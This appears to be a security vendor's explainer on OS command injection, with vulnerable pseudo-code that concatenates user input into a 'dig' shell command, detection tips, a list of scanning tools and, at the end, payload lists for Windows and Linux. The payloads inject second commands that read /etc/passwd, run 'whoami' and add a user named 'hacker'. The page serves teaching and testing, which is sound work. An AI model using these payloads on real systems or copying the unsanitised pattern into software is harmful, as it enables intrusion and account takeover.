Generic Command Injection Vulnerability Scanner

One common way to exploit a command injection vulnerability is through the use of shell commands. Attackers can pass in malicious input that will be executed as a shell command by the app. This can allow attackers to execute arbitrary commands on the system or gain access to sensitive information.

Command injection vulnerabilities are different from code injection vulnerabilities. Code injection vulnerabilities allow attackers to execute arbitrary application code on the app.

Operation System Command Execution in the Applications

In order to operate, some web applications must execute operating system commands (OS commands) from time to time. An application, for example, might need to run a shell script and get its output. When an application issues an OS command, it transmits the string to the operating system so that it may be executed.

Typically, user input must be parsed before it can be used as an argument in an OS command. This parsing usually consists of removing any special characters that could be used to change the meaning of the command or its arguments. For example, the shell uses certain characters, such as & (ampersand) and | (pipe), for special purposes. If these characters are not stripped out before being used as part of an OS command, they could be used by an attacker to change the meaning of the command.

Sample Code For OS Command Injection Vulnerabilities

In the following pseudo-code, user input is not properly sanitized before being used to form an OS command. This could allow an attacker to inject arbitrary commands into the application.

/* take user input and turn it into a shell command to DNS Query*/
command = user_input;
/* use user input with a DNS query command*/
command = "dig "+ command
/* issue the shell command to the operating system */
output =system(command);
print(output)

As you can see, an attacker could exploit this vulnerability by entering a specially crafted string as user input. By doing so, they could execute arbitrary commands on the system. For example, by entering 'google.com' the program will execute

`dig google.com`

end print output. But if an attacker gives input like `google.com && another command the program will execute:

`dig google.com && another command`

which can run the attacker's command.

How to Detect OS Command Injection Vulnerability

To find out whether a given piece of software is vulnerable to command injection, you can simply supply it with various strings containing shell metacharacters (&, |, ;, `, \", \', (, ), <, >, *, ?, space) and other characters that have special meaning to the operating system. If the software executes these strings as commands without properly sanitizing them first, then it is likely vulnerable to command injection.

The online S4E OS command injection scanner checks the given application parameters for vulnerability. You can also use some other tools like;

• Burp Suite Professional
• Commix
• w3af
• OWASP ZAP

Payloads For OS Command Injection Vulnerabilities

There are a number of different payloads that can be used to exploit OS command injection vulnerabilities. In many cases, the payload will simply allow the attacker to execute arbitrary commands on the system.

General payloads

Payload for Windows

• dir
• | dir
• ; dir
• $(`dir`)
• & dir
• &&dir
• && ipconfig /all
• | net user hacker Password1 /ADD

Payloads for Linux

• ;id
• ;netstat -a;
• ;system('cat%20/etc/passwd')
• & ping -i 30 127.0.0.1 &
• cat /etc/hosts
• $(`cat /etc/passwd`)
• " || whoami